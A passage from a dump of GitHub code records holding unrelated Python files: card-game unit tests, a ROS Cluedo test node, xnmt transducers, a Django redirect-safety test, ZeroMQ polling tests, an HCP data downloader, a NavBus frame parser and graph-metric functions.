self.assertEqual(self.juego_6.turnos_jugados, 1373)\n self.assertEqual(self.juego_6.ganador, 'jugador 2')\n \n def test_resulta_empate(self):\n \"\"\"\n compruebo el resultado de 2 partidas con empate\n \"\"\"\n\n # juego empate\n self.juego_7 = JuegoGuerra(random_seed=547)\n self.juego_8 = JuegoGuerra(random_seed=296)\n\n self.juego_7.iniciar_juego()\n self.juego_8.iniciar_juego()\n \n self.assertTrue(self.juego_7.empate)\n self.assertTrue(self.juego_8.empate)\n\nclass TestMazo(unittest.TestCase):\n def setUp(self):\n self.mazo= Mazo()\n\n# Chequeo de repartir/poner arriba, sacar arriba/principio y poner abajo/final\n def test_poner_sacar_arriba(self): #Poner arriba al momento de repartir las cartas, sacar arriba al momento de jugar el turno\n carta1=Carta('5','trebol')\n self.mazo.poner_arriba(carta1)\n self.assertIs(carta1, self.mazo.mazo.items[0])\n carta2=self.mazo.sacar_arriba()\n self.assertIs(carta1, carta2)\n\n# def test_poner_abajo(self): #Poner abajo al momento de ganar el turno\n \n \n \nif __name__ == '__main__':\n unittest.main()\n","repo_name":"marianiz/Practica-Algoritmos","sub_path":"TP1_juego_guerra/pruebas/test_juego_guerra.py","file_name":"test_juego_guerra.py","file_ext":"py","file_size_in_byte":3258,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"4774913577","text":"#! /usr/bin/env python\r\n\r\n\"\"\"! @file test_oracle_plus_interface.py\r\n\r\n@brief testing the nodes cluedo_oracle.cpp and cluedo_armor_interface.cpp\r\n \r\n@authors Francesco Ganci (S4143910)\r\n@version v1.0\r\n\r\nEach time an hint arrives, store it into the ontology. 
\r\n\r\n@see test_cluedo_oracle_plus_interface.launch launch file for the test\r\n\r\n\"\"\"\r\n\r\nimport rospy\r\nfrom robocluedo_msgs.srv import CheckSolution, CheckSolutionRequest, CheckSolutionResponse\r\nfrom std_msgs.msg import Empty\r\nfrom robocluedo_msgs.msg import Hint\r\nfrom robocluedo_msgs.srv import AddHint, AddHintRequest, AddHintResponse\r\nfrom robocluedo_msgs.srv import FindConsistentHypotheses, FindConsistentHypothesesRequest, FindConsistentHypothesesResponse\r\nfrom robocluedo_msgs.msg import Hypothesis\r\nfrom robocluedo_msgs.srv import DiscardHypothesis, DiscardHypothesisRequest, DiscardHypothesisResponse\r\nfrom std_srvs.srv import Trigger, TriggerRequest, TriggerResponse\r\n\r\n\r\n\r\n\r\nclient_name_check_solution = \"/check_solution\"\r\nclient_check_solution = None\r\n\r\npublisher_name_hint_sig = \"/hint_signal\"\r\npublisher_hint_sig = None\r\n\r\nsubscriber_name_hint = \"/hint\"\r\n\r\nclient_name_add_hint = \"/cluedo_armor/add_hint\"\r\nclient_add_hint = None\r\n\r\nclient_name_find_consistent_h = \"/cluedo_armor/find_consistent_h\"\r\nclient_find_consistent_h = None\r\n\r\nclient_name_wrong_h = \"/cluedo_armor/wrong_hypothesis\"\r\nclient_wrong_h = None\r\n\r\nclient_name_backup = \"/cluedo_armor/backup\"\r\nclient_backup = None\r\n\r\n\r\n\r\n\r\ntest_name = \"test_oracle_plus_interface\"\r\n\r\n\r\ndef make_hint_to_ontology( id, prop, val ):\r\n\tsrv_hint = AddHintRequest( )\r\n\t\r\n\t''' add hint request\r\n\t# the numeric ID of the hint\r\n\tint32 hypID\r\n\r\n\t# fields of the property\r\n\tstring property\r\n\tstring Aelem\r\n\tstring Belem\r\n\t'''\r\n\t\r\n\tsrv_hint.hypID = id\r\n\tsrv_hint.property = prop\r\n\tsrv_hint.Aelem = \"HP\" + str( id )\r\n\tsrv_hint.Belem = val\r\n\t\r\n\treturn srv_hint\r\n\r\n\r\ndef callback_hint( hint ):\r\n\tglobal hint_idx\r\n\tglobal received\r\n\tglobal client_add_hint\r\n\t\r\n\trospy.loginfo( \"[%s] (number %d) received: HP%d(%s:%s)\", test_name, hint_idx, hint.HintID, hint.HintType, hint.HintContent )\r\n\t\r\n\trospy.loginfo( \"[%s] adding hint to the ontology... 
\", test_name )\r\n\tclient_add_hint( make_hint_to_ontology( hint.HintID, hint.HintType, hint.HintContent ) )\r\n\t\r\n\thplist = client_find_consistent_h( ).hyp\r\n\tif len(hplist) > 0:\r\n\t\trospy.loginfo( \"[%s] consistent hypotheses right now: \", test_name )\r\n\t\trospy.loginfo( \"[%s] received size : %d \", test_name, len(hplist) )\r\n\t\tfor i in range( len(hplist) ):\r\n\t\t\trospy.loginfo( \"[%s] -> %s(where:%s, what:%s, who:%s)\", test_name, hplist[i].tag, hplist[i].where, hplist[i].what, hplist[i].who )\r\n\r\n\r\n\r\n\r\nhint_idx = 0\r\nreceived = False\r\ndef perform_tests( ):\r\n\tglobal publisher_name_hint_sig\r\n\tglobal client_check_solution\r\n\tglobal hint_idx\r\n\t\r\n\t# rospy.loginfo( \"number 1: hint system\" )\r\n\t\r\n\tfor hintno in range( 50 ):\r\n\t\trospy.loginfo( \"[%s] sending signal %d ...\", test_name, hint_idx )\r\n\t\tpublisher_hint_sig.publish( Empty( ) )\r\n\t\thint_idx = hint_idx + 1\r\n\t\trospy.sleep( rospy.Duration( 0.1 ) )\r\n\t\r\n\trospy.loginfo( \"[%s] saving the ontology...\", test_name )\r\n\tclient_backup( )\r\n\r\n\r\n\r\n\r\ndef main( ):\r\n\t# global \r\n\t\r\n\t# altre operazioni utili prima di iniziare i test...\r\n\t\r\n\tperform_tests( )\r\n\r\n\r\n\r\n\r\ndef on_shut_msg( ):\r\n\trospy.loginfo( \"[%s] closing...\", test_name )\r\n\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n\trospy.init_node( test_name )\r\n\trospy.on_shutdown( on_shut_msg )\r\n\t\r\n\t# client : check solution\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_check_solution )\r\n\trospy.wait_for_service( client_name_check_solution )\r\n\tclient_check_solution = rospy.ServiceProxy( client_name_check_solution, CheckSolution )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# publisher : hint signal\r\n\trospy.loginfo( \"[%s] opening publisher to topic [%s] ...\", test_name, publisher_name_hint_sig )\r\n\tpublisher_hint_sig = rospy.Publisher( publisher_name_hint_sig, Empty, queue_size=1 )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# subscriber : hint\r\n\trospy.loginfo( \"[%s] subscribing to topic [%s] ...\", test_name, subscriber_name_hint )\r\n\t# rospy.wait_for_message( subscriber_name_hint, Hint )\r\n\trospy.Subscriber( subscriber_name_hint, Hint, callback_hint )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : add hint\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_add_hint )\r\n\trospy.wait_for_service( client_name_add_hint )\r\n\tclient_add_hint = rospy.ServiceProxy( client_name_add_hint, AddHint )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : find consistent hypotheses\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_find_consistent_h )\r\n\trospy.wait_for_service( client_name_find_consistent_h )\r\n\tclient_find_consistent_h = rospy.ServiceProxy( client_name_find_consistent_h, FindConsistentHypotheses )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : wrong hypothesis\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_wrong_h )\r\n\trospy.wait_for_service( client_name_wrong_h )\r\n\tclient_wrong_h = rospy.ServiceProxy( client_name_wrong_h, DiscardHypothesis )\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\t# service : backup\r\n\trospy.loginfo( \"[%s] asking for service [%s] ...\", test_name, client_name_backup )\r\n\trospy.wait_for_service( client_name_backup )\r\n\tclient_backup = rospy.ServiceProxy( client_name_backup, Trigger 
)\r\n\trospy.loginfo( \"[%s] OK!\", test_name )\r\n\t\r\n\tmain( )\r\n","repo_name":"programmatoroSeduto/ExperimentalRoboticsLab-Assignment-1","sub_path":"robocluedo/scripts/test_oracle_plus_interface.py","file_name":"test_oracle_plus_interface.py","file_ext":"py","file_size_in_byte":5442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"1232043696","text":"from typing import List\nimport numbers\n\nimport xnmt\nimport xnmt.tensor_tools as tt\nfrom xnmt.modelparts import transforms\nfrom xnmt.persistence import serializable_init, Serializable\nfrom xnmt import expression_seqs\n\nif xnmt.backend_dynet:\n import dynet as dy\n\nclass FinalTransducerState(object):\n \"\"\"\n Represents the final encoder state; Currently handles a main (hidden) state and a cell\n state. If cell state is not provided, it is created as tanh^{-1}(hidden state).\n Could in the future be extended to handle dimensions other than h and c.\n\n Args:\n main_expr: expression for hidden state\n cell_expr: expression for cell state, if exists\n \"\"\"\n def __init__(self, main_expr: tt.Tensor, cell_expr: tt.Tensor=None) -> None:\n self._main_expr = main_expr\n self._cell_expr = cell_expr\n\n def main_expr(self) -> tt.Tensor:\n return self._main_expr\n\n def cell_expr(self) -> tt.Tensor:\n \"\"\"Returns:\n cell state; if not given, it is inferred as inverse tanh of main expression\n \"\"\"\n if self._cell_expr is None:\n # TODO: This taking of the tanh inverse is disabled, because it can cause NaNs\n # Instead just copy\n # self._cell_expr = 0.5 * dy.log( dy.cdiv(1.+self._main_expr, 1.-self._main_expr) )\n self._cell_expr = self._main_expr\n return self._cell_expr\n\nclass SeqTransducer(object):\n \"\"\"\n A class that transforms one sequence of vectors into another, using :class:`expression_seqs.ExpressionSequence` objects as inputs and outputs.\n \"\"\"\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n \"\"\"\n Parameters should be :class:`expression_seqs.ExpressionSequence` objects wherever appropriate\n\n Args:\n seq: An expression sequence representing the input to the transduction\n\n Returns:\n result of transduction, an expression sequence\n \"\"\"\n raise NotImplementedError(\"SeqTransducer.transduce() must be implemented by SeqTransducer sub-classes\")\n\n def get_final_states(self) -> List[FinalTransducerState]:\n \"\"\"Returns:\n A list of FinalTransducerState objects corresponding to a fixed-dimension representation of the input, after having invoked transduce()\n \"\"\"\n raise NotImplementedError(\"SeqTransducer.get_final_states() must be implemented by SeqTransducer sub-classes\")\n\n\n########################################################\n\nclass ModularSeqTransducer(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that stacks several :class:`xnmt.transducer.SeqTransducer` objects, all of which must\n accept exactly one argument (an :class:`expression_seqs.ExpressionSequence`) in their transduce method.\n \n Args:\n input_dim: input dimension (not required)\n modules: list of SeqTransducer modules\n \"\"\"\n\n yaml_tag = '!ModularSeqTransducer'\n\n @serializable_init\n def __init__(self, input_dim: numbers.Integral, modules: List[SeqTransducer]):\n self.modules = modules\n\n def shared_params(self):\n return [{\".input_dim\", \".modules.0.input_dim\"}]\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n for module 
in self.modules:\n seq = module.transduce(seq)\n return seq\n\n def get_final_states(self) -> List[FinalTransducerState]:\n final_states = []\n for mod in self.modules:\n final_states += mod.get_final_states()\n return final_states\n\n\nclass IdentitySeqTransducer(SeqTransducer, Serializable):\n \"\"\"\n A transducer that simply returns the input.\n \"\"\"\n\n yaml_tag = '!IdentitySeqTransducer'\n\n @serializable_init\n def __init__(self) -> None:\n pass\n\n def transduce(self, seq: 'expression_seqs.ExpressionSequence') -> 'expression_seqs.ExpressionSequence':\n return seq\n\n@xnmt.require_dynet\nclass TransformSeqTransducerDynet(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that applies a given transformation to the sequence's tensor representation\n\n Args:\n transform: the Transform to apply to the sequence\n downsample_by: if > 1, downsample the sequence via appropriate reshapes.\n The transform must accept a respectively larger hidden dimension.\n \"\"\"\n yaml_tag = '!TransformSeqTransducer'\n\n @serializable_init\n def __init__(self, transform: transforms.Transform, downsample_by: numbers.Integral = 1) -> None:\n self.transform = transform\n if downsample_by < 1: raise ValueError(f\"downsample_by must be >=1, was {downsample_by}\")\n self.downsample_by = downsample_by\n\n def get_final_states(self) -> List[FinalTransducerState]:\n return self._final_states\n\n def transduce(self, src: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:\n src_tensor = src.as_tensor()\n out_mask = src.mask\n if self.downsample_by > 1:\n assert len(src_tensor.dim()[0])==2, \\\n f\"Downsampling only supported for tensors of order two. Found dims {src_tensor.dim()}\"\n (hidden_dim, seq_len), batch_size = src_tensor.dim()\n if seq_len % self.downsample_by != 0:\n raise ValueError(\n \"For downsampling, sequence lengths must be multiples of the total reduce factor. 
\"\n \"Configure batcher accordingly.\")\n src_tensor = dy.reshape(src_tensor,\n (hidden_dim*self.downsample_by, seq_len//self.downsample_by),\n batch_size=batch_size)\n if out_mask:\n out_mask = out_mask.lin_subsampled(reduce_factor=self.downsample_by)\n output = self.transform.transform(src_tensor)\n if self.downsample_by==1:\n if len(output.dim())!=src_tensor.dim(): # can happen with seq length 1\n output = dy.reshape(output, src_tensor.dim()[0], batch_size=src_tensor.dim()[1])\n output_seq = expression_seqs.ExpressionSequence(expr_tensor=output, mask=out_mask)\n self._final_states = [FinalTransducerState(output_seq[-1])]\n return output_seq\n\n\n@xnmt.require_torch\nclass TransformSeqTransducerTorch(SeqTransducer, Serializable):\n \"\"\"\n A sequence transducer that applies a given transformation to the sequence's tensor representation\n\n Args:\n transform: the Transform to apply to the sequence\n downsample_by: if > 1, downsample the sequence via appropriate reshapes.\n The transform must accept a respectively larger hidden dimension.\n \"\"\"\n yaml_tag = '!TransformSeqTransducer'\n\n @serializable_init\n def __init__(self, transform: transforms.Transform, downsample_by: numbers.Integral = 1) -> None:\n self.transform = transform\n if downsample_by < 1: raise ValueError(f\"downsample_by must be >=1, was {downsample_by}\")\n self.downsample_by = downsample_by\n\n def get_final_states(self) -> List[FinalTransducerState]:\n return self._final_states\n\n def transduce(self, src: expression_seqs.ExpressionSequence) -> expression_seqs.ExpressionSequence:\n src_tensor = src.as_tensor()\n out_mask = src.mask\n if self.downsample_by > 1:\n assert src_tensor.dim()==3, \\\n f\"Downsampling only supported for tensors of order two (+ batch). Found dims {src_tensor.size()}\"\n batch_size , seq_len, hidden_dim = src_tensor.size()\n if seq_len % self.downsample_by != 0:\n raise ValueError(\n \"For downsampling, sequence lengths must be multiples of the total reduce factor. 
\"\n \"Configure batcher accordingly.\")\n src_tensor = src_tensor.view((batch_size, seq_len//self.downsample_by, hidden_dim*self.downsample_by))\n if out_mask:\n out_mask = out_mask.lin_subsampled(reduce_factor=self.downsample_by)\n output = self.transform.transform(src_tensor)\n output_seq = expression_seqs.ExpressionSequence(expr_tensor=output, mask=out_mask)\n self._final_states = [FinalTransducerState(output_seq[-1])]\n return output_seq\n\nTransformSeqTransducer = xnmt.resolve_backend(TransformSeqTransducerDynet, TransformSeqTransducerTorch)","repo_name":"neulab/xnmt","sub_path":"xnmt/transducers/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":7857,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"81"} +{"seq_id":"4282490252","text":"from django.test import TestCase, override_settings\n\nfrom core.utils import (\n internal_redirect,\n)\n\n\nclass TestUtils(TestCase):\n @override_settings(\n ALLOWED_HOSTS=[\n \"trade-remedies.com\",\n ]\n )\n def test_internal_redirect(self):\n test_redirect = internal_redirect(\n \"https://trade-remedies.com/test\",\n \"/dashboard/\",\n )\n\n assert test_redirect.url == \"https://trade-remedies.com/test\"\n\n test_redirect = internal_redirect(\n \"https://www.google.com/?test=1\",\n \"/dashboard/\",\n )\n\n assert test_redirect.url == \"/dashboard/\"\n","repo_name":"uktrade/trade-remedies-caseworker","sub_path":"trade_remedies_caseworker/core/tests/test_utils.py","file_name":"test_utils.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"81"} +{"seq_id":"19842469756","text":"# -*- coding: utf-8 -\n#\n# This file is part of uzmq. See the NOTICE for more information.\n\nimport pyuv\nimport zmq\nfrom zmq.tests import BaseZMQTestCase\n\nimport time\n\nfrom uzmq import ZMQPoll\n\ndef wait():\n time.sleep(.25)\n\nclass TestPoll(BaseZMQTestCase):\n\n def test_simple(self):\n \"\"\"Tornado poller implementation maps events correctly\"\"\"\n req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n\n loop = pyuv.Loop.default_loop()\n poll = ZMQPoll(loop, rep)\n\n r = []\n def cb(handle, ev, error):\n r.append(ev & pyuv.UV_READABLE)\n r.append(rep.recv())\n\n poll.start(pyuv.UV_READABLE, cb)\n req.send(b'req')\n t = pyuv.Timer(loop)\n\n def stop(h):\n poll.stop()\n\n t = pyuv.Timer(loop)\n t.start(stop, 0.4, 0.0)\n loop.run()\n\n assert r == [1, b'req']\n\n def test_poll_rw(self):\n \"\"\"Tornado poller implementation maps events correctly\"\"\"\n req,rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n wait()\n\n loop = pyuv.Loop.default_loop()\n poll = ZMQPoll(loop, rep)\n poll1 = ZMQPoll(loop, req)\n\n r = []\n def cb(handle, ev, error):\n r.append(ev & pyuv.UV_READABLE)\n r.append(rep.recv())\n handle.close()\n\n def cb1(handle, ev, error):\n\n r.append(ev & pyuv.UV_WRITABLE)\n req.send(b'req')\n handle.stop()\n\n poll.start(pyuv.UV_READABLE, cb)\n poll1.start(pyuv.UV_WRITABLE, cb1)\n\n t = pyuv.Timer(loop)\n\n def stop(h):\n poll.stop()\n poll1.close()\n\n loop.run()\n\n assert r == [2, 1, b'req']\n\n def test_echo(self):\n req, rep = self.create_bound_pair(zmq.REQ, zmq.REP)\n wait()\n\n loop = pyuv.Loop.default_loop()\n p = ZMQPoll(loop, rep)\n p1 = ZMQPoll(loop, req)\n\n r = []\n r1 = []\n\n def cb(handle, ev, error):\n if ev & pyuv.UV_READABLE:\n data = rep.recv()\n r.append(data)\n\n\n if ev & pyuv.UV_WRITABLE:\n rep.send(r[-1])\n if len(r) == 2:\n handle.stop()\n\n\n\n def cb1(handle, ev, error):\n if ev & 
pyuv.UV_READABLE:\n data = req.recv()\n r1.append(data)\n\n if len(r1) == 2:\n handle.stop()\n\n\n if ev & pyuv.UV_WRITABLE:\n req.send(b\"echo\")\n\n\n p.start(pyuv.UV_READABLE | pyuv.UV_WRITABLE, cb)\n p1.start(pyuv.UV_READABLE | pyuv.UV_WRITABLE, cb1)\n\n\n req.send(b\"echo\")\n\n def stop(h):\n p.close()\n p1.close()\n\n loop.run()\n\n assert r == [b'echo', b'echo']\n assert r1 == [b'echo', b'echo']\n","repo_name":"benoitc/uzmq","sub_path":"tests/test_poll.py","file_name":"test_poll.py","file_ext":"py","file_size_in_byte":2796,"program_lang":"python","lang":"en","doc_type":"code","stars":35,"dataset":"github-code","pt":"81"} +{"seq_id":"21480574846","text":"#Run this file to download any required packages and organize the NMA preprocessed HCP data\n#\n#Example use:\n#\t- Download resting state data: python data_downloader.py rest\n#\t- Download all data (not recommended): python data_downloader.py\n#\n#Written by TLB 2020\n\nimport os, sys, requests, tarfile\nimport shutil\nfrom tqdm import tqdm #for monitoring download progress\n\ndef download_preprocessed_hcp(dataset_dict, download_dir):\n\t'''\n\n\tArgs:\n\t\t- dataset_dict (dict): a dictionary where keys are the name of the current preprocessed \n\t\t\tdataset to download ('rest, 'task', or 'covariates') and values are a list containing\n\t\t\tname to write file and OSF weblink to the dataset\n\t\t- download_dir (string): where to write downloaded files\n\t'''\n\n\tfor dataset, info in dataset_dict.items():\n\t\tfname, weblink = info\n\t\tdownload_path = f'{download_dir}/{fname}'\n\n\t\tif not os.path.exists(download_path): #grab the data file from the OSF weblink\n\n\t\t\tresponse = requests.get(f'{weblink}', stream=True)\n\n\t\t\ttotal_size = int(response.headers.get('content-length', 0))\n\t\t\tblock_size = 1024 #1 Kibibyte\n\n\t\t\tif response.status_code == 200:\n\t\t\t\tprint (f'Downloading {fname} to {download_path}')\n\t\t\t\twith open(download_path, 'wb') as f:\n\t\t\t\t\twith tqdm(total=total_size, unit='iB', unit_scale=True) as pbar:\n\t\t\t\t\t\tfor data in response.iter_content(block_size):\n\t\t\t\t\t\t\tpbar.update(len(data))\n\t\t\t\t\t\t\tf.write(data)\n\n\t\tprint (f'Extracting files for {fname}')\n\n\t\tif 'tgz' in fname: #untar if tar file\n\t\t\ttar = tarfile.open(download_path, \"r:gz\")\n\t\t\ttar.extractall(path=download_dir)\n\t\t\ttar.close()\n\n\t\t\t#python doesn't have a strip components argument\n\t\t\t#reorganize dir\n\t\t\tsource = download_dir + '/' + fname.split('.')[0]\n\t\t\tdest = download_dir + '/'\n\n\t\t\tmerge_folders(source, dest)\n\t\t\tshutil.rmtree(source)\n\n\ndef merge_folders(root_src_dir, root_dst_dir):\n\t'''\n\n\tTaken from https://lukelogbook.tech/2018/01/25/merging-two-folders-in-python/\n\n\tSolves the problem shutil has w/ merging two dirs w/ same name\n\t\n\t'''\n\tfor src_dir, dirs, files in os.walk(root_src_dir):\n\t\tdst_dir = src_dir.replace(root_src_dir, root_dst_dir, 1)\n\t\tif not os.path.exists(dst_dir):\n\t\t\tos.makedirs(dst_dir)\n\t\tfor file_ in files:\n\t\t\tsrc_file = os.path.join(src_dir, file_)\n\t\t\tdst_file = os.path.join(dst_dir, file_)\n\t\t\tif os.path.exists(dst_file):\n\t\t\t\tos.remove(dst_file)\n\t\t\tshutil.copy(src_file, dst_dir)\n\ndef download_data(HCP_DIR=\"./hcp\", *argv):\n\t'''\n\n\tCreates the directory structure and downloads data of NMA preprocessed HCP dataset\n\tHCP_DIR\n\n\tArgs:\n\t\t- HCP_DIR (string): path to where data should be downloaded\n\t\t- *argv (string): can be any of ['rest', 'task, 'covariates']. 
If none are provided, downloads all possible sets\n\t'''\n\n\tdatasets = {'rest': ['hcp_rest.tgz', 'https://osf.io/bqp7m/download/'],\n\t\t'task': ['hcp_task.tgz', 'https://osf.io/s4h8j/download/'],\n\t\t'covariates': ['hcp_covariates.tgz', 'https://osf.io/x5p4g/download/'],\n\t\t'atlas': ['atlas.npz', 'https://osf.io/j5kuc/download']}\n\t\n\tif not os.path.isdir(HCP_DIR):\n\t os.mkdir(HCP_DIR)\n\n\tif not len(argv):\n\t\tdownload_preprocessed_hcp(datasets, HCP_DIR)\n\telse: #download a subset of the data based on the argument strings proviced\n\t\tdesired_datasets = {key: datasets[key] for key in argv}\n\t\tdownload_preprocessed_hcp(desired_datasets, HCP_DIR)\n\nif __name__ == \"__main__\":\n\n\tHCP_DIR = \"./hcp\"\n\tspecific_sets = sys.argv[1:]\n\tdownload_data(HCP_DIR, *specific_sets)","repo_name":"tlasmanbotch/macro-functional-organization","sub_path":"data_downloader.py","file_name":"data_downloader.py","file_ext":"py","file_size_in_byte":3385,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"8830626499","text":"#!/usr/bin/env python\n\nimport argparse, pathlib\nfrom colorama import Fore, Back, Style\n\n# width=16 poly=0x1021 init=0xffff refin=true refout=true xorout=0x0000 check=0x6f91 residue=0x0000 name=\"CRC-16/MCRF4XX\"\nfrom crccheck.crc import Crc16Mcrf4Xx\n\nparser = argparse.ArgumentParser()\nparser.add_argument('filename', type=pathlib.Path, nargs='+') #type=argparse.FileType('r'))\nargs = parser.parse_args()\n\nframe_end = b'\\x71\\x01'\n\nfor filename in args.filename:\n with open(filename, 'rb') as logf:\n chunks = logf.read().split(frame_end)\n for chunk in chunks:\n if len(chunk)<1:\n break\n else:\n # re-attach the frame ending\n chunk += frame_end\n# print(\"\".join('{:02X}'.format(n) for n in chunk))\n\n state = 'unknown'\n subframe_len = 0\n subframe_n = 0\n subframe_type = 0\n c = 0x01\n stuffed = False\n inframe = False\n crcinst = Crc16Mcrf4Xx()\n\n for n in range(len(chunk)):\n prev_c = c\n c = chunk[n]\n\n # handle frame begin/end and byte stuffing\n if inframe == False:\n if c == 0x00 and prev_c == 0x71:\n inframe = True\n stuffed = False\n state = 'framestart'\n else:\n if c == 0x71:# and state != 'subframedata':\n if stuffed:\n prev_c = 0xff\n stuffed = False\n else:\n stuffed = True\n continue\n elif stuffed:# and state != 'subframedata':\n stuffed = False\n inframe = False\n state = 'unknown'\n if c == 0x01:\n # frame end\n state = 'frameend'\n print('{}{:02X}'.format(Fore.RED,prev_c), end='')\n if c == 0x00:\n # frame start, should not happen here\n pass\n print('{}{}{:02X}{}'.format(Fore.BLACK, Back.YELLOW,prev_c,Style.RESET_ALL))\n\n # frame/subframe states\n oldstate = state\n if state == 'framestart':\n print('{0}{1}{2}'.format(Fore.RED,'7100',Style.RESET_ALL), end='')\n state = 'subframelen'\n elif state == 'subframelen':\n subframe_len = int(c)\n crcinst.process([c])\n print('{}{:02X}'.format(Fore.YELLOW,c), end='')\n subframe_n = 0\n subframe_type = 0\n if subframe_len < 2:\n # TODO: do we need to check for correct offsets to next subframe?\n state = 'unknown'\n else:\n subframe_n = 1\n state = 'subframetype'\n elif state == 'subframetype':\n subframe_type = int(c)\n print('{}{:02X}'.format(Fore.CYAN,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframetstamp'\n elif state == 'subframetstamp':\n print('{}{:02X}'.format(Fore.MAGENTA,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframetstamp2'\n elif state == 'subframetstamp2':\n 
print('{:02X}{}'.format(c,Style.RESET_ALL), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframedata'\n elif state == 'subframedata':\n print('{:02X}'.format(c), end='')\n crcinst.process([c])\n if (subframe_n +3) < subframe_len:\n subframe_n += 1\n else:\n state = 'subframecrc'\n elif state == 'subframecrc':\n print('{}{:02X}'.format(Fore.GREEN,c), end='')\n crcinst.process([c])\n subframe_n += 1\n state = 'subframecrc2'\n elif state == 'subframecrc2':\n print('{:02X}{}'.format(c,Style.RESET_ALL), end='')\n crcinst.process([c])\n if crcinst.final() != 0:\n print(\"CRC error\")\n exit(1)\n else:\n crcinst.reset()\n subframe_n += 1\n state = 'subframelen'\n elif state == 'frameendlead':\n if c == 0x71:\n #print('{}{:02X}'.format(Fore.RED,c), end='')\n state = 'frameend'\n else:\n #print('{}{}{:02X}'.format(Fore.RED,Back.BLUE,c), end='')\n state = 'unknown'\n elif state == 'frameend':\n if c == 0x01:\n # frame complete\n pass\n print('{:02X}{}'.format(c, Style.RESET_ALL))\n state = 'unknown'\n inframe = False\n else:\n state = 'unknown'\n\n# print(hex(subframe_n) + \" \"+ hex(c) + \" \"+str(stuffed)+ \" \"+oldstate)\n\n\n\n\n","repo_name":"speters/_navbus-protokoll","sub_path":"nb.py","file_name":"nb.py","file_ext":"py","file_size_in_byte":5638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"81"} +{"seq_id":"74761499786","text":"from BML.transform.graph import Graph\nfrom BML.utils import timeFormat\nfrom BML.transform.nodes_features import *\n\nimport multiprocessing\nimport networkit as nk\nimport networkx as nx\n\nimport random\nimport time\nimport numpy as np\n\ndef avgNodes(function, *args):\n d = function(*args)\n return(np.mean([*d.values()]))\n\ndef nb_of_nodes(G, nodes):\n return(np.float64(len(G.nodes)))\n\ndef nb_of_edges(G, nodes):\n return(np.float64(len(G.edges)))\n\ndef diameter(G, nodes):\n return(np.float64(nx.diameter(G, usebounds=True)))\n\ndef assortativity(G, nodes):\n return(np.float64(nx.degree_assortativity_coefficient(G)))\n\ndef percolation_limit(G, nodes):\n degrees = np.array(list(degree(G, nodes).values()))\n k0 = np.sum(degrees/len(G))\n k02 = np.sum((degrees**2)/len(G))\n pl = 1 - 1/(k02/k0 -1)\n return(np.float64(pl))\n\ndef node_connectivity(G, nodes): # if ,too slow see approx\n return(np.float64(nx.node_connectivity(G)))\n\ndef edge_connectivity(G, nodes):\n return(np.float64(nx.edge_connectivity(G)))\n\ndef algebraic_connectivity(G, nodes, eigenvalues=None):\n laplacian_eigenvalues = None\n if(not eigenvalues is None):\n laplacian_eigenvalues = eigenvalues[\"laplacian\"]\n if(laplacian_eigenvalues is None):\n laplacian_eigenvalues = np.real(nx.laplacian_spectrum(G))\n \n laplacian_eigenvalues = np.delete(laplacian_eigenvalues, laplacian_eigenvalues.argmin())\n v = np.min(laplacian_eigenvalues)\n return(np.float64(v))\n\ndef largest_eigenvalue(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n return(np.float64(max(adjacency_eigenvalues)))\n\ndef symmetry_ratio(G, nodes, eigenvalues=None):\n adjacency_eigenvalues = None\n if(not eigenvalues is None):\n adjacency_eigenvalues = eigenvalues[\"adjacency\"]\n if(adjacency_eigenvalues is None):\n adjacency_eigenvalues = np.real(nx.adjacency_spectrum(G))\n r = len(np.unique(adjacency_eigenvalues))/(diameter(G, nodes)+1)\n return(np.float64(r))\n\ndef 
